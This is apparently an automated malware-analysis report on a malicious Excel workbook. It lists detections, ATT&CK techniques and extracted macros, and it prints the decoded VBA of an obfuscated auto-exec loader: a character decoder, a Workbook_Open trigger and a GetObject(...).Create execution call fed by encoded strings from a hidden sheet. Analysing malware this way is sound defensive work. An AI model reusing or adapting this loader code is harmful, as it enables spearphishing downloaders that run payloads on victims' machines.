MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is an Excel document containing both VBA and Excel 4.0 macros, with critical heuristics indicating an obfuscated auto-exec loader. The VBA macro uses GetObject to create and execute an object, likely downloading and running a second-stage payload. The presence of both macro types and the obfuscation suggests a sophisticated downloader, commonly used in spearphishing campaigns.
Heuristics 7
-
ClamAV: Xls.Malware.Valyria-9756472-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-9756472-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 1802 bytes |
SHA-256: 89fbf4ed436db0a706f3c5f49740bc1a215ec9721c9730853a5fba9ba9508dc6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 17 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Test Pag ' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - HGUR ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' Sheet,Reference,Formula,Value ' Test Pag,B7,*STACKERROR* not enough arguments for function: RAND,"" ' Test Pag,C7,*STACKERROR* not enough arguments for function: RAND,"" ' Test Pag,B8,[],"" ' Test Pag,C8,[],"" ' Test Pag,B9,[],"" ' Test Pag,C9,[],"" ' Test Pag,B10,[],"" ' Test Pag,C10,[],"" ' Test Pag,B11,[],"" ' Test Pag,C11,[],"" ' Test Pag,B12,[],"" ' Test Pag,C12,[],"" ' Test Pag,B13,[],"" ' Test Pag,C13,[],"" ' Test Pag,B14,[],"" ' Test Pag,C14,[],"" ' Test Pag,B15,[],"" ' Test Pag,C15,[],"" ' Test Pag,B16,[],"" ' Test Pag,C16,[],"" ' Test Pag,B17,[],"" ' Test Pag,C17,[],"" ' Test Pag,B18,[],"" ' Test Pag,C18,[],"" ' Test Pag,B19,[],"" ' Test Pag,C19,[],"" ' Test Pag,B20,[],"" ' Test Pag,C20,[],"" ' Test Pag,B21,[],"" ' Test Pag,C21,[],"" ' Test Pag,B22,[],"" ' Test Pag,C22,[],"" ' Test Pag,B23,[],"" ' Test Pag,C23,[],"" ' Test Pag,B24,[],"" ' Test Pag,C24,[],"" ' Test Pag,B25,[],"" ' Test Pag,C25,[],"" ' Test Pag,B26,[],"" ' Test Pag,C26,[],"" ' Test Pag,B27,[],"" ' Test Pag,C27,[],"" ' Test Pag,B28,[],"" ' Test Pag,C28,[],"" ' Test Pag,B29,[],"" ' Test Pag,C29,[],"" ' Test Pag,B30,[],"" ' Test Pag,C30,[],"" ' Test Pag,B31,[],"" ' Test Pag,C31,[],"" |
|||
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5380 bytes |
SHA-256: 97fe2c640d87e90ccefeed37ff424eb40b033eee1593c570f4d8bd046590cfbe |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private ra791e361394df2 As Variant
Private Function r5e63526981(b5ce25564f As Long) As String
Dim ed6d85e1f9c2 As Long: Dim df94f1edcdea6e As String
For ed6d85e1f9c2 = 1 To Len(ra791e361394df2(b5ce25564f)) Step 2: df94f1edcdea6e = df94f1edcdea6e & Chr(CInt(Chr(Int(0 - 13 - 5 + 9 + 3 + 7 + Int(12 / 7) - 10 + Int(12 / 4) + 8 + 35)) & Chr(Int(0 + 4 + Int(9 / 1) - 8 + Int(9 / 9) + 7 + 59)) & Mid(ra791e361394df2(b5ce25564f), ed6d85e1f9c2, 2)) - 4): Next
r5e63526981 = df94f1edcdea6e
End Function
Private Sub m9ebcfd864b5()
ra791e361394df2 = Split(ThisWorkbook.Sheets("HGURG").Range("J106").Value, ","): Dim ze67833e9a1: Set ze67833e9a1 = GetObject(r5e63526981(1)): ze67833e9a1.Create r5e63526981(0), Null, Null, Null
End Sub
Function Interpolate(X, x0 As Range, y0 As Range)
Dim n, i, j, k As Integer
'Check that rows are same size'
If (x0.Cells.Count <> y0.Cells.Count) Then
MsgBox ("X and Y vector to interpolate command has to be same size!")
End If
n = x0.Cells.Count
For i = 1 To n - 1
j = x0(i).Value
k = x0(i + 1).Value
If j > k Then
MsgBox ("X vector to interpolate command has to be increasing!")
Return
End If
Next i
If X < x0(1).Value Then
k = (y0(2).Value - y0(1).Value) / (x0(2).Value - x0(1).Value)
Interpolate = y0(1).Value + (X - x0(1).Value) * k
'Check if X0>x0(END)'
ElseIf X > x0(n).Value Then
k = (y0(n).Value - y0(n - 1).Value) / (x0(n).Value - x0(n - 1).Value)
Interpolate = y0(n).Value + (X - x0(n).Value) * k
Else
'Loop through values and find where the value are'
For i = 1 To n
If X <= x0(i).Value Then
If (x0(i).Value - x0(i - 1).Value) <> 0 Then
k = (y0(i).Value - y0(i - 1).Value) / (x0(i).Value - x0(i - 1).Value)
Interpolate = y0(i).Value + (X - x0(i).Value) * k
Else
Interpolate = y0(i).Value + x0(i).Value
End If
Exit For
End If
Next i
End If
End Function
Sub Workbook_Open()
Dim rffa72741bff76f As Long: rffa72741bff76f = 18
Dim tbcbdfa72a93736c As String
Dim z4c25f5aa6a189cf As Long
Select Case rffa72741bff76f
Case 5 * Int(75 / 79) - Int(3254 / 961) * 17
If 9 > 6 Then
Dim tomNet0 As Long
tomNet0 = (21 - 14) / 7
Dim xTopp0 As Long
xTopp0 = (tomNet0 / 25) - 9
Else
Dim lastNt0 As Long
lastNt0 = ((17 / 21) - 23)
Dim yRet0 As Long
yRet0 = (lastNt0 - 10) - 16
End If
Case 29 / Int(23 + 16 / 19) / 12
If 11 > 27 Then
Dim tomNet1 As Long
tomNet1 = (13 - 4) + 7
Dim xTopp1 As Long
xTopp1 = (tomNet1 + 8) - 26
Else
Dim lastNt1 As Long
lastNt1 = ((6 - 26) - 25)
Dim yRet1 As Long
yRet1 = (lastNt1 / 11) - 27
End If
Case 22 / Int(9 + 11 / 20) / 16
If 16 > 21 Then
Dim tomNet2 As Long
tomNet2 = (18 - 18) - 22
Dim xTopp2 As Long
xTopp2 = (tomNet2 - 13) - 22
Else
Dim lastNt2 As Long
lastNt2 = ((16 + 15) - 24)
Dim yRet2 As Long
yRet2 = (lastNt2 + 14) - 27
End If
Case 27 / Int(19 + 14 / 4) / 12
If 9 > 24 Then
Dim tomNet3 As Long
tomNet3 = (17 - 12) - 29
Dim xTopp3 As Long
xTopp3 = (tomNet3 - 26) - 24
Else
Dim lastNt3 As Long
lastNt3 = ((22 - 15) - 19)
Dim yRet3 As Long
yRet3 = (lastNt3 - 13) - 29
End If
Case 6 + (192 - 288) + 22
If 5 > 22 Then
Dim tomNet4 As Long
tomNet4 = (14 - 14) * 20
Dim xTopp4 As Long
xTopp4 = (tomNet4 + 20) - 9
Else
Dim lastNt4 As Long
lastNt4 = ((16 - 28) - 28)
Dim yRet4 As Long
yRet4 = (lastNt4 + 9) - 17
End If
Case 18 - (27 + 15) - 28
If 26 > 24 Then
Dim tomNet5 As Long
tomNet5 = (6 - 11) * 11
Dim xTopp5 As Long
xTopp5 = (tomNet5 * 15) - 6
Else
Dim lastNt5 As Long
lastNt5 = ((26 - 24) - 19)
Dim yRet5 As Long
yRet5 = (lastNt5 / 8) - 8
End If
Case ((((18 * 8) / 4) * 4) / 8):
Dim tomNet6 As Long
tomNet6 = (25 / 10) + 5 / 15
Dim
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.